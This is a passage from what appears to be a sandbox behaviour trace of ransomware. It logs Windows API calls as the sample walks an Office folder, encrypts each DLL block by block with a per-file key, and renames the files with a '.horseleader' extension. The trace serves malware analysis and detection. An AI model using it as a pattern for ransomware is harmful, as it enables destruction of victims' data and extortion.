lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.996] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.006] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.007] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.007] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.007] CloseHandle (hObject=0x1a4) returned 1 [0237.018] GetProcessHeap () returned 0x780000 [0237.019] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.019] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.horseleader") returned 88 [0237.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.horseleader")) returned 1 [0237.020] GetProcessHeap () returned 0x780000 [0237.020] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.020] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b30dd00, ftCreationTime.dwHighDateTime=0x1cac9ab, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5b30dd00, ftLastWriteTime.dwHighDateTime=0x1cac9ab, nFileSizeHigh=0x0, nFileSizeLow=0xd980, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="MSOINTL.DLL.IDX_DLL", cAlternateFileName="MSOINT~1.IDX")) returned 1 [0237.020] lstrcmpiW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="Windows") returned -1 [0237.020] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 84 [0237.020] StrStrIW (lpFirst="MSOINTL.DLL.IDX_DLL", lpSrch=".horseleader") returned 0x0 [0237.020] lstrcmpW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="#Decrypt#.txt") returned 1 [0237.020] lstrcmpW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="_uninstalling_.png") returned 1 [0237.020] lstrlenW (lpString=".testttjffg") returned 11 [0237.020] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL", lpSrch=".testttjffg") returned 0x0 [0237.021] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.021] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.022] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 84 [0237.022] StrStrW (lpFirst="MSOINTL.DLL.IDX_DLL", lpSrch=".txt") returned 0x0 [0237.022] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=55680) returned 1 [0237.022] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.026] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.027] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.027] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.028] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.028] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.028] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3980, lpOverlapped=0x0) returned 1 [0237.028] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc680, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.028] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3980, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3980, lpOverlapped=0x0) returned 1 [0237.029] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.029] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.029] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.029] CloseHandle (hObject=0x1a4) returned 1 [0237.029] GetProcessHeap () returned 0x780000 [0237.029] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.030] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.horseleader") returned 96 [0237.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.horseleader")) returned 1 [0237.031] GetProcessHeap () returned 0x780000 [0237.031] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.031] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c620a00, ftCreationTime.dwHighDateTime=0x1cac9ab, ftLastAccessTime.dwLowDateTime=0xeee8f1b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5c620a00, ftLastWriteTime.dwHighDateTime=0x1cac9ab, nFileSizeHigh=0x0, nFileSizeLow=0x152f80, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="MSOINTL.REST.IDX_DLL", cAlternateFileName="MSOINT~2.IDX")) returned 1 [0237.031] lstrcmpiW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="Windows") returned -1 [0237.031] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 85 [0237.031] StrStrIW (lpFirst="MSOINTL.REST.IDX_DLL", lpSrch=".horseleader") returned 0x0 [0237.031] lstrcmpW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="#Decrypt#.txt") returned 1 [0237.031] lstrcmpW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="_uninstalling_.png") returned 1 [0237.032] lstrlenW (lpString=".testttjffg") returned 11 [0237.032] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL", lpSrch=".testttjffg") returned 0x0 [0237.032] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.032] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.033] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 85 [0237.033] StrStrW (lpFirst="MSOINTL.REST.IDX_DLL", lpSrch=".txt") returned 0x0 [0237.033] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1388416) returned 1 [0237.033] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.033] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.038] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.039] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.039] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa6fc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.039] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.042] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.042] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.042] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14df80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.043] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.046] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.046] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.046] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.047] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.047] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.047] CloseHandle (hObject=0x1a4) returned 1 [0237.047] GetProcessHeap () returned 0x780000 [0237.047] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.047] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.horseleader") returned 97 [0237.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.horseleader")) returned 1 [0237.049] GetProcessHeap () returned 0x780000 [0237.049] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.049] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15d97a00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0xeeedb470, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x15d97a00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0xa388, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="MSSOAPR3.DLL", cAlternateFileName="")) returned 1 [0237.049] lstrcmpiW (lpString1="MSSOAPR3.DLL", lpString2="Windows") returned -1 [0237.049] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 77 [0237.049] StrStrIW (lpFirst="MSSOAPR3.DLL", lpSrch=".horseleader") returned 0x0 [0237.049] lstrcmpW (lpString1="MSSOAPR3.DLL", lpString2="#Decrypt#.txt") returned 1 [0237.049] lstrcmpW (lpString1="MSSOAPR3.DLL", lpString2="_uninstalling_.png") returned 1 [0237.049] lstrlenW (lpString=".testttjffg") returned 11 [0237.049] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL", lpSrch=".testttjffg") returned 0x0 [0237.049] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.049] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.051] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 77 [0237.051] StrStrW (lpFirst="MSSOAPR3.DLL", lpSrch=".txt") returned 0x0 [0237.051] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=41864) returned 1 [0237.051] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.054] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.054] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.054] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.060] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.060] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.061] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x388, lpOverlapped=0x0) returned 1 [0237.061] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffc78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.061] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x388, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x388, lpOverlapped=0x0) returned 1 [0237.061] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.061] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.062] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.062] CloseHandle (hObject=0x1a4) returned 1 [0237.062] GetProcessHeap () returned 0x780000 [0237.062] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.062] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.horseleader") returned 89 [0237.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.horseleader")) returned 1 [0237.063] GetProcessHeap () returned 0x780000 [0237.064] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.064] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x356f9800, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x356f9800, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x2d88, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="OARPMANR.DLL", cAlternateFileName="")) returned 1 [0237.064] lstrcmpiW (lpString1="OARPMANR.DLL", lpString2="Windows") returned -1 [0237.064] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 77 [0237.064] StrStrIW (lpFirst="OARPMANR.DLL", lpSrch=".horseleader") returned 0x0 [0237.064] lstrcmpW (lpString1="OARPMANR.DLL", lpString2="#Decrypt#.txt") returned 1 [0237.064] lstrcmpW (lpString1="OARPMANR.DLL", lpString2="_uninstalling_.png") returned 1 [0237.064] lstrlenW (lpString=".testttjffg") returned 11 [0237.064] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL", lpSrch=".testttjffg") returned 0x0 [0237.064] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.064] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 77 [0237.065] StrStrW (lpFirst="OARPMANR.DLL", lpSrch=".txt") returned 0x0 [0237.065] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=11656) returned 1 [0237.065] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2d88, lpOverlapped=0x0) returned 1 [0237.071] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd278, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.071] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2d88, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2d88, lpOverlapped=0x0) returned 1 [0237.072] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.072] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.072] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.072] CloseHandle (hObject=0x1a4) returned 1 [0237.072] GetProcessHeap () returned 0x780000 [0237.072] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.073] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: 